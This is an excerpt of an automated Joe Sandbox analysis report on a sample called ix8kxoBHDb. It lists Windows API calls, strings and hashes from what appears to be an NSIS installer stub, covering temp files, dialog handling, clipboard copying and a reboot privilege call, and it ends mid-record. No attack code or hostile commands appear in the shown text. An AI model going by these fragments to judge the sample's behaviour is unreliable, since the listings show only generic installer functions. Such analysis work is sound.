                                                  • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                  • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                  • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98
                                                  APIs
                                                  • SetErrorMode.KERNEL32 ref: 004034C8
                                                  • GetVersion.KERNEL32 ref: 004034CE
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                  • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                  • OleInitialize.OLE32(00000000), ref: 00403545
                                                  • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                  • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                  • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                    • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                    • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                  • GetTempPathW.KERNEL32(00000400,00437800,?,00000006,00000008,0000000A), ref: 004036E8
                                                  • GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                  • lstrcatW.KERNEL32(00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                  • GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                  • lstrcatW.KERNEL32(00437800,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                  • SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,00000008,0000000A), ref: 0040373A
                                                  • DeleteFileW.KERNEL32(00437000,?,00000006,00000008,0000000A), ref: 0040374E
                                                    • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                  • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                  • ExitProcess.KERNEL32 ref: 0040383A
                                                  • lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                  • lstrcatW.KERNEL32(00437800,0040A328,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                  • lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                  • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                  • SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,00000008,0000000A), ref: 0040388F
                                                  • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                  • CopyFileW.KERNEL32(00438800,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                  • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                  • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                  • ExitProcess.KERNEL32 ref: 004039E0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                  • String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                  • API String ID: 3441113951-334447862
                                                  • Opcode ID: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                  • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                  • Opcode Fuzzy Hash: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                  • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                  • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                  • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                  • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                  • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                  • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                  • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                  • GlobalFree.KERNEL32(?), ref: 004051FC
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                  • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                  • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                  • ShowWindow.USER32(00000000), ref: 004053AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 1638840714-813528018
                                                  • Opcode ID: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                  • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                  • Opcode Fuzzy Hash: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                  • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
                                                  APIs
                                                  • DeleteFileW.KERNEL32(?,?,00437800,756F2EE0,00000000), ref: 00405B23
                                                  • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,00437800,756F2EE0,00000000), ref: 00405B6B
                                                  • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,00437800,756F2EE0,00000000), ref: 00405B8E
                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,00437800,756F2EE0,00000000), ref: 00405B94
                                                  • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,00437800,756F2EE0,00000000), ref: 00405BA4
                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                  • FindClose.KERNEL32(00000000), ref: 00405C53
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: 0WB$\*.*
                                                  • API String ID: 2035342205-351390296
                                                  • Opcode ID: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                  • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                  • Opcode Fuzzy Hash: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                  • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                  • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                  • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                  • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00437800,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,756F2EE0,00405B1A,?,00437800,756F2EE0), ref: 00406736
                                                  • FindClose.KERNEL32(00000000), ref: 00406742
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID: xgB
                                                  • API String ID: 2295610775-399326502
                                                  • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                  • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                  • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                  • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                  • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                  • GetClientRect.USER32(?,?), ref: 00405639
                                                  • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                  • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                  • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                    • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                  • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                  • ShowWindow.USER32(00000000), ref: 00405788
                                                  • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                  • ShowWindow.USER32(00000008), ref: 004057D7
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                  • CreatePopupMenu.USER32 ref: 0040581C
                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                  • GetWindowRect.USER32(?,?), ref: 00405850
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                  • OpenClipboard.USER32(00000000), ref: 004058B1
                                                  • EmptyClipboard.USER32 ref: 004058B7
                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                  • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                  • CloseClipboard.USER32 ref: 00405912
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: (7B${
                                                  • API String ID: 590372296-525222780
                                                  • Opcode ID: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                  • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                  • Opcode Fuzzy Hash: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                  • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                  • ShowWindow.USER32(?), ref: 00403EDF
                                                  • DestroyWindow.USER32 ref: 00403EF3
                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                  • GetDlgItem.USER32(?,?), ref: 00403F30
                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                  • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                  • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                  • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                  • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                  • ShowWindow.USER32(00000000,?), ref: 00404135
                                                  • EnableWindow.USER32(?,?), ref: 00404147
                                                  • EnableWindow.USER32(?,?), ref: 00404162
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                  • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                  • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                  • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                  • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                  • String ID: (7B
                                                  • API String ID: 184305955-3251261122
                                                  • Opcode ID: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                  • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                  • Opcode Fuzzy Hash: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                  • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D
                                                  APIs
                                                    • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                    • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                  • lstrcatW.KERNEL32(00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800,756F3420,00435000,00000000), ref: 00403B59
                                                  • lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800), ref: 00403BD9
                                                  • lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                  • GetFileAttributesW.KERNEL32(004281E0), ref: 00403BF7
                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C40
                                                    • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                  • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                  • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                  • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                  • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: (7B$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                  • API String ID: 1975747703-1425696872
                                                  • Opcode ID: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                  • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                  • Opcode Fuzzy Hash: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                  • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D
                                                  APIs
                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                  • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                  • GetSysColor.USER32(?), ref: 004045FE
                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                  • lstrlenW.KERNEL32(?), ref: 0040461F
                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                  • SendMessageW.USER32(00000000), ref: 004046A1
                                                  • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                  • SetCursor.USER32(00000000), ref: 00404720
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                  • SetCursor.USER32(00000000), ref: 0040473C
                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                  • String ID: N
                                                  • API String ID: 3103080414-1130791706
                                                  • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                  • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                  • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                  • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                  APIs
                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                  • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
